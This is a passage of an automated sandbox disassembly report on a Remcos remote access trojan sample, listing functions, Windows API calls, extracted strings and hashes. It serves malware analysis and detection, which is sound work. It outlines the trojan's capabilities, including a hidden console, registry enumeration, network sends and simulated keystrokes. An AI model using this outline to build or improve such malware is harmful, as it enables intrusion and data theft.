                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: (x$dMG$|MG
                                • API String ID: 1356121797-2752281621
                                • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32(?), ref: 0041D4F3
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407260 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 40COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: (x$C:\Users\user\Desktop\1m70ggeepT.exe$Rmc-3XK1S0$hdF$Mw
                                • API String ID: 0-4178600357
                                • Opcode ID: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: 1c629e4396ebd3af338879a422fac1621c8df490be40c15e87bc48e2ed270b23
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                  • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                  • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                  • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                • String ID: t^F
                                • API String ID: 3950776272-389975521
                                • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: PkG$hpw$NG$NG
                                • API String ID: 1649129571-1814069858
                                • Opcode ID: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: a9a7ce0a0b90b44db80bc4e59ffcd89cd879969cdb5479c222021ee2e07a9105
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413D0D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumInfoOpenQuerysend
                                • String ID: hdF$xUG$NG$NG$TG
                                • API String ID: 3114080316-2774981958
                                • Opcode ID: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
                                • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                • Opcode Fuzzy Hash: f05c03517f952f3a355b8cbbd5c3f5256b4ab212a1f163f9846f57004d6dde5d
                                • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000), ref: 00404BC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B68A Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,(x), ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • _wcslen.LIBCMT ref: 0041B763
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: (x$.exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 3286818993-4145380074
                                • Opcode ID: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$Window$AllocOutputShow
                                • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                • API String ID: 4067487056-3065609815
                                • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: e0ecee58873bfc0077d13325f43c3460f208f04ecf7db505f3535ec2a758da20
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
